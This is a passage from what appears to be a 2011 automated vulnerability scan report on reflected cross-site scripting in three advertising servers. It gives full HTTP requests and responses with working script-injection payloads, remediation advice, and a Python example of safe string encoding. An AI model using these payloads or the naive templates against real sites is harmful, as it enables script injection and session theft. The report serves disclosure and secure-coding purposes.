bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#
<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q
!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:27 GMT
Pragma: no-cache
Content-Length: 4690
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?2f258"><script>alert(1)</script>bb97804a671=1&Z=468x60&s=1384085&t=2" target="_parent">
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f2c2"-alert(1)-"6ceae886f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, inside the rm_url assignment of the inline script. The payload closes the string, splices in alert(1) with the subtraction operator so the statement stays syntactically valid, and reopens the string. The response carries no Content-Type header, but its body begins with <html>, so browsers render it as HTML and execute the script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; here the parameter name is not needed in the output at all. Where a value must be emitted, it should be written as a complete JavaScript string literal produced by a JavaScript-string encoder (quotes, backslashes and line terminators escaped, and < > & emitted as \u escapes so that neither a quote nor </script> reaches the parser), not dropped between existing quotation marks.

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085&8f2c2"-alert(1)-"6ceae886f18=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#
<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q
!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:28 GMT
Pragma: no-cache
Content-Length: 4644
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8f2c2"-alert(1)-"6ceae886f18=1&Z=468x60&s=1384085&_salt=140315222";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgex

Issue detail

The value of the buyerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a45a3</script><script>alert(1)</script>90304e5e524 was submitted in the buyerId parameter. This input was echoed unmodified in the application's response. The payload does not need to close the single quotes: the HTML parser ends the enclosing script block at the first </script> it sees, regardless of JavaScript quoting, and the <script> that follows opens a new block. The response is served as text/html and sets a JSESSIONID cookie without the HttpOnly flag, so script injected here can read that session token.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it must, buyerId should be URL-encoded as a query-string value and the surrounding string emitted as a complete JavaScript literal with < > & written as \u escapes, so that a </script> in the value can never terminate the script block.

Request

GET /viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:48 GMT
Server: VoxCAST
Last-Modified: Mon, 09 May 2011 14:02:48 GMT
Cache-Control: max-age=1200
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
X-Cache: MISS from VoxCAST
Set-Cookie: JSESSIONID=1529D62A75546E533E45404DDEDC6525; Path=/
Content-Length: 9924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<style type="text/css" media="screen">
body{

...[SNIP]...
<img id="mochilaTrack" src="http://admatch-syndication.mochila.com/images/ad.gif?mtyp=tout&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&channelId=13429&mcmp=IBDTout&mche=', Math.random(), '" />
...[SNIP]...
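The reflections in 3.25 (a double-quoted JavaScript string, broken with "-alert(1)-") and 3.26 (a single-quoted string inside an HTML page, broken with </script>) share one root cause: the value is dropped between existing quotation marks. The following Python is an added example, not code from either ad server or from the report. It reproduces both breakouts with simplified stand-in templates (assumed shapes, not the servers' real source) and shows an encoder that emits a complete JavaScript string literal, with < > & written as \u escapes, which neither payload can escape.

```python
"""Safe embedding of a value in an inline-script string literal.

Added example, not code from the ad servers in findings 3.25 and 3.26. It
rebuilds the two reflection shapes the report captured with a naive template
(a double-quoted JS string, and a single-quoted JS string inside an HTML page,
where the HTML parser honours "</script>" regardless of JS quoting) and shows
an encoder that emits a complete literal neither payload can escape. The
payloads are copied from the report; the templates are simplified stand-ins
for the real responses, not their actual source."""
import json
import re

PAYLOAD_3_25 = '8f2c2"-alert(1)-"6ceae886f18'
PAYLOAD_3_26 = 'a45a3</script><script>alert(1)</script>90304e5e524'

# Naive templates: the value is dropped into an existing quoted slot, which is
# what both captures show.
UNSAFE_3_25 = '<script>rm_url = "http://ad.yieldmanager.com/imp?{v}=1";</script>'
UNSAFE_3_26 = "<script>document.write('<img src=\"/images/ad.gif?buyerId={v}\" />');</script>"
# Hardened templates: the slot receives a complete literal, quotes included.
SAFE_3_25 = '<script>rm_url = "http://ad.yieldmanager.com/imp?" + {lit} + "=1";</script>'
SAFE_3_26 = "<script>document.write('<img src=\"/images/ad.gif?buyerId=' + {lit} + '\" />');</script>"


def build_unsafe(template, value):
    """Plain concatenation: the behaviour the report observed."""
    return template.replace("{v}", value)


def js_string_literal(value):
    """Return `value` as a JS string literal that is safe inside an HTML
    <script> block. json.dumps (ensure_ascii=True) escapes quotes, backslashes,
    control characters and all non-ASCII code points, which covers the
    U+2028/U+2029 line terminators. The extra replacements keep '<', '>' and
    '&' out of the emitted text, so the HTML parser can never see '</script>'
    or '<!--' inside the literal; JS decodes the \\u escapes back to the
    original characters, so the data is unchanged."""
    lit = json.dumps(value)
    return lit.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def build_safe(template, value):
    """Fill the {lit} slot with a complete, encoded literal."""
    return template.replace("{lit}", js_string_literal(value))


def injected_script_terminator(html):
    """True if the HTML parser would find a second </script> in this text,
    i.e. one that ends the block before the template's own closing tag."""
    return len(re.findall(r"</script", html, re.I)) > 1


def literal_is_intact(literal, value):
    """True if `literal` parses as exactly one string equal to `value`. JSON
    string syntax is a subset of JS string syntax, so json.loads is a usable
    oracle: a literal split by an unescaped quote fails here."""
    try:
        return json.loads(literal) == value
    except ValueError:
        return False


def demo():
    """Run both payloads through the naive and hardened templates."""
    rows = []
    for name, payload, unsafe, safe in (("3.25", PAYLOAD_3_25, UNSAFE_3_25, SAFE_3_25),
                                        ("3.26", PAYLOAD_3_26, UNSAFE_3_26, SAFE_3_26)):
        rows.append({
            "finding": name,
            # naive double-quoting of the raw value: does it survive as one literal?
            "naive_quoting_intact": literal_is_intact('"%s"' % payload, payload),
            "unsafe_breaks_script": injected_script_terminator(build_unsafe(unsafe, payload)),
            "safe_breaks_script": injected_script_terminator(build_safe(safe, payload)),
            "safe_literal_intact": literal_is_intact(js_string_literal(payload), payload),
            "safe_output": build_safe(safe, payload),
        })
    return rows


if __name__ == "__main__":
    for row in demo():
        print(row["finding"], "naive quoting intact:", row["naive_quoting_intact"],
              "| naive breaks block:", row["unsafe_breaks_script"],
              "| safe breaks block:", row["safe_breaks_script"])
        print("  ", row["safe_output"])
```

The encoder relies on json.dumps because JSON string syntax is a subset of JavaScript string syntax; the \u003c, \u003e and \u0026 replacements are what stop the HTML tokenizer from ending the script block, since it does not understand JavaScript escapes. The same approach applies to the single-quoted document.write strings in 3.27 and 3.28, with URL-encoding of the query value applied first.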

3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2252b'-alert(1)-'d4dfa0675de was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response. The response is served as application/x-javascript and, with admeld_call_type=js, is meant to be loaded through a <script> tag, so the injected expression executes in whichever page includes this URL. The payload closes the single-quoted string passed to document.write, splices in alert(1) with the subtraction operator so the statement remains valid, and reopens the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The value seen here is numeric (193), so validating it as digits before use would close the issue; more generally it should be URL-encoded as a query-string parameter of the match URL and the whole string emitted through a JavaScript-string encoder rather than placed between existing quotes.

Request

